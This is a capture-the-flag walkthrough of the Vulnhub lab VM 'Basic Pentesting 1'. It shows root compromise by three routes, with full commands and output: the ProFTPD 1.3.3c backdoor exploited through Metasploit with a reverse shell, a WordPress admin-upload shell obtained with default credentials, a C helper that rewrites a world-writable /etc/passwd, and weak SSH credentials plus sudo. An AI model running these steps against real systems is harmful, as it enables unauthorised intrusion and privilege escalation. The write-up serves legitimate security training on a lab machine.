Vulnhub Basic Pentesting – 1 Writeup

This is a walkthrough of Vulnhub machine ‘Basic Pentesting-1 released on Dec 8th, 2017. Credits to Josiah Pierce for releasing this  VM. I imported the virtual machine in VMware Player in NAT mode itself. In this machine, we have to gain root access.

Server IP: 192.168.21.146
Attacker IP: 192.168.1.147
Note: Edit hosts file to add “192.168.21.146 vtcsec” (Not Mandatory)

Using Nmap to enumerate the open ports

$root@kali:~# nmap -sC -sV 192.168.21.146
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-10 07:27 IST
Nmap scan report for vtcsec (192.168.21.146)
Host is up (0.000044s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
|   256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_  256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:4F:6B:0C (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.72 seconds

I have exploited the machine in three ways consider only one port open at once.

Exploitation using port 21 (proftpd 1.3.3c)

Scanning port 21 for vulnerabilities using Nmap

$root@kali:~# nmap --script=vuln -p21 192.168.21.146
Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-10 07:34 IST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for vtcsec (192.168.21.146)
Host is up (0.00017s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-proftpd-backdoor: 
|   This installation has been backdoored.
|   Command: id
|_  Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
|_sslv2-drown: 
MAC Address: 00:0C:29:4F:6B:0C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 41.43 seconds

Exploiting the Proftpd 1.3.3c using Metasploit module exploit/unix/ftp/proftpd_133c_backdoor

$root@kali:~# msfconsole
......
msf > use exploit/unix/ftp/proftpd_133c_backdoor 
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.21.147
lhost => 192.168.21.147
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 192.168.21.146
rhost => 192.168.21.146
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.21.147:4444 
[*] 192.168.21.146:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo TDh3k6X8Fd2mIKU9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "TDh3k6X8Fd2mIKU9\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.21.147:4444 -> 192.168.21.146:33154) at 2018-01-10 07:46:00 +0530
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

Exploitation using port 80 (Web Server)

Enumeration of port 80 web server using Nikto

$root@kali:~# nikto -h http://192.168.21.146
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.21.146
+ Target Hostname:    192.168.21.146
+ Target Port:        80
+ Start Time:         2018-01-10 08:01:13 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xb1 0x55e1c7758dcdb 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2018-01-10 08:01:24 (GMT5.5) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Browsing http://192.168.21.146/secret/ shows a WordPress site

Trying username ‘admin’ and password ‘admin’ in http://192.168.21.146/secret/wp-admin/ gives us WordPress admin access. Using Metasploit module exploit/unix/webapp/wp_admin_shell_upload, a low-privileged shell is obtained.

$root@kali:~# msfconsole
.....
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD admin
PASSWORD => admin
msf exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /secret/
TARGETURI => /secret/
msf exploit(unix/webapp/wp_admin_shell_upload) > set lhost 192.168.21.147
lhost => 192.168.21.147
msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.21.146
rhost => 192.168.21.146
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.21.147:4444 
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /secret/wp-content/plugins/PGtlMmeils/uuzjewXkbs.php...
[*] Sending stage (37543 bytes) to 192.168.21.146
[*] Meterpreter session 1 opened (192.168.21.147:4444 -> 192.168.21.146:33170) at 2018-01-10 08:32:40 +0530
[+] Deleted uuzjewXkbs.php
[+] Deleted PGtlMmeils.php

meterpreter > getuid
Server username: www-data (33)

Now while enumerating for privilege escalation, /etc/passwd was found to be world writable.

meterpreter > shell
Process 5303 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/sh")'
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -al /etc/passwd
ls -al /etc/passwd
-rw-rw-rw- 1 root root 2410 Jan  9 20:44 /etc/passwd 

To escalate privileges I can now edit the /etc/passwd file. I am taking the help of a code password.c, created by our CTF Team Member, zC00l deriving from Dirty c0w exploit. It is used to generate a string to replace the ‘root’ entry in /etc/passwd to add our own password.

password.c

/* Credits to zC00l; Edited using Dirty c0w exploit*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
#include <string.h>

const char* salt = "zc00l";
const char* common_passwd_file = "/etc/passwd";

struct Userinfo {
   char *username;
   char *hash;
   int user_id;
   int group_id;
   char *info;
   char *home_dir;
   char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}

int main(int argc, char **argv)
{
    struct Userinfo user;
    user.username = "root";
    user.user_id = 0;
    user.group_id = 0;
    user.info = "root";
    user.home_dir = "/root";
    user.shell = "/bin/sh";
  char* plaintext_pw;
    if (argc >= 2) {
        plaintext_pw = argv[1];
        printf("Please enter the new password: %s\n", plaintext_pw);
    } else {
        plaintext_pw = getpass("Please enter the new password: ");
    }
    user.hash = generate_password_hash(plaintext_pw);
    char *complete_passwd_line = generate_passwd_line(user);
    strtok(complete_passwd_line, "\n");
    printf("User line: %s/", complete_passwd_line);
  return 0;
}

Copying the contents of victim’s /etc/passwd and paste it into a file in attacker system. Now compile password.c and execute it. When prompted, I have used password ‘test’

$root@kali:~# gcc -o password password.c -lcrypt
$root@kali:~# ./password 
Please enter the new password: 
User line: root:zc9jtfILVqO8A:0:0:root:/root:/bin/sh/

Using root:zc9jtfILVqO8A:0:0:root:/root:/bin/sh (Note, a end slash has been removed) to replace ‘root’ entry in local file. Copy the modified file to victim system to replace existing /etc/passwd. (copying and pasting in base64 format is recommended).
The modified /etc/passwd file in victim should be

$ head -n 1 /etc/passwd
head -n 1 /etc/passwd
root:zc9jtfILVqO8A:0:0:root:/root:/bin/sh

Finally root access

$ su root
su root
Password: test
# id
id
uid=0(root) gid=0(root) groups=0(root)

Exploitation using port 22 ( SSH Service)

It’s a simple proof how easy it is to gain access with weak passwords. Login using username ‘marlinspike’ and password ‘marlinspike’ (Once, you get a shell to victim you can see the user ‘marlinspike’ in /etc/passwd).  Using sudo elevate privileges to root.

$root@kali:~# ssh marlinspike@192.168.21.146
marlinspike@192.168.21.146's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
....
Last login: Tue Jan  9 22:55:19 2018 from 192.168.21.147
marlinspike@vtcsec:~$ sudo su -
[sudo] password for marlinspike: 
# id
uid=0(root) gid=0(root) groups=0(root)

Please comment if you find other methods!!

One thought on “Vulnhub Basic Pentesting – 1 Writeup

Leave a Reply

Your email address will not be published. Required fields are marked *